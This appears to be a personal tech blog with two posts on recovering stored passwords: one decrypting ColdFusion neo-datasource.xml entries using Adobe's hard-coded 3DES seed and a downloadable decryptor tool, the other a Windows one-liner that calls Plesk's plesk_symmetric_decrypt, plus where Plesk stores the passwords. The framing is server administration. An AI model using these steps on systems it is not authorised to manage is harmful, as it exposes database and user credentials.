ColdFusion Data Source Decryption

The Problem

Have you ever needed to decrypt the passwords stored in ColdFusion’s [ColdFusion Install Dir]\lib\neo-datasource.xml file? Whether you are migrating between servers or are just curious what that password is, it’s a pain as an admin to work around the extra layer of security.

Reverse Engineering the Passwords

From ColdFusion 8 (probably older) to ColdFusion 9, passwords were stored encrypted. However it is well known that Adobe hard coded the seed “0yJ!@1$r8p0L@r1$6yJ!@1rj” and used the algorithm 3DES and then stored the password with Base64 encoding. This meant that for years, if any neo-datasource.xml or neo-query.xml files were compromised, anyone could reverse engineer the passwords.

Starting with ColdFusion 10 and 11 (and likely moving forward) the passwords are now generated from a random seed found in the [ColdFusion Install Dir]\lib\seed.properties file. This makes it impossible for a leaked neo-datasource.xml file to be reverse engineered without having the seed. Furthermore, there are likely multiple algorithms as you will find the algorithm “AES/CBC/PKCS5Padding” in most of the seed.properties files as well.

Further Reading

While the encryption is “better” in ColdFusion 10 and later versions, we must always remember that there are some things which cannot be protected. An example of that is the effort to encrypt DVDs because, if the DVD player needed to decrypt the DVD to show it to you that means that the DVD player held the means to decrypt it. Similarly, if the ColdFusion data source passwords needed to be decrypted to establish the connection to the database, the means to decrypt any stored password must also be present. This will not change, it will only be a matter of time/effort before it is reverse-engineered.

My Solution

Since encryption can be confusing (I won’t judge Adobe/ColdFusion’s popularity here) there seems to be no easy way for an admin to decrypt these passwords. This is where my ColdFusion Decryptor program comes in. Simply feed it a single password, or an entire neo-datasource.xml file, and it spits out the decrypted information for you. You’re Welcome =)

 

ColdFusion Decryptor

Download Link: https://api.waycool.tech/ColdFusionDecryptor.exe

To Use the ColdFusion Decryptor, you first need to know what version of ColdFusion you are wanting to decrypt. If it’s 10 or higher, first fill in the ColdFusion 10+ Seed box. Once this is done, you can then either input a single encrypted string from the neo-datasource.xml file or select the whole damn neo-datasource.xml file, your choice =). After Selecting a file it will automatically be parsed. Please note that the only supported algorithm for ColdFusion 10 or newer is “AES/CBC/PKCS5Padding” (you can find your algorithm in the seed.properties file).

This should work to decrypt ColdFusion passwords from Windows or Linux servers.

It’s that simple. Have fun! As is no warranties. No Whining.

Plesk Password Encryption on Windows

Plesk Encryption

Plesk, love it or hate it it’s the most popular control panel used on Windows servers. I’ve had the unfortunate experience of working with the panel since Plesk 8. Fortunately, it has been improved over the years and I’ve grown to like it. Over the course of it’s life Plesk (v10 to be exact) finally made the choice to not store passwords in clear text. This was one of the best choices they could have made for the sake of security. However, this has made it difficult for IT admins to quickly replicate an end user problem. So today I discuss how to bring that symmetrically encrypted password back to clear text!

If I haven’t lost you yet, here is the one-liner to get the password in the clear on a Windows OS:

"%plesk_dir%\admin\bin\php.exe" -r "echo plesk_symmetric_decrypt('ENCRYPTED_STRING_HERE');"

What does this do?

The Windows command line command above uses the Plesk environment variable along with the path to Plesk’s PHP to run (-r means without script tags) an echo command through PHP using Plesk’s own function (plesk_symmetric_decrypt) to get the password. In short, all you need to do is replace the text ‘ENCRYPTED_STRING_HERE’ with the password from Plesk’s database and the clear text will be sent to the command line output. WayCool hu?

Additional Information

There are a few things to note regarding this:

  1. The command must be executed from the same server which the encrypted string was found on.
  2. Only passwords with the type ‘sym’ (Symmetric-key) can be decrypted using this function.
  3. Passwords with the type ‘crypt’  cannot be reverse-engineered (as far as I’m aware). These passwords use PHP’s Crypt method explained here and will likely start with ‘$5$’ in Plesk’s database .

If you are unsure where in Plesk’s database the passwords are stored, try using  HeidiSQL (or Plesk’s dbclient.exe command) and browsing the sys_users and databaseservers tables which link back to the accounts table by account_id.

 

If have any thoughts on this, be WayCool and drop a comment below!

 

–Devin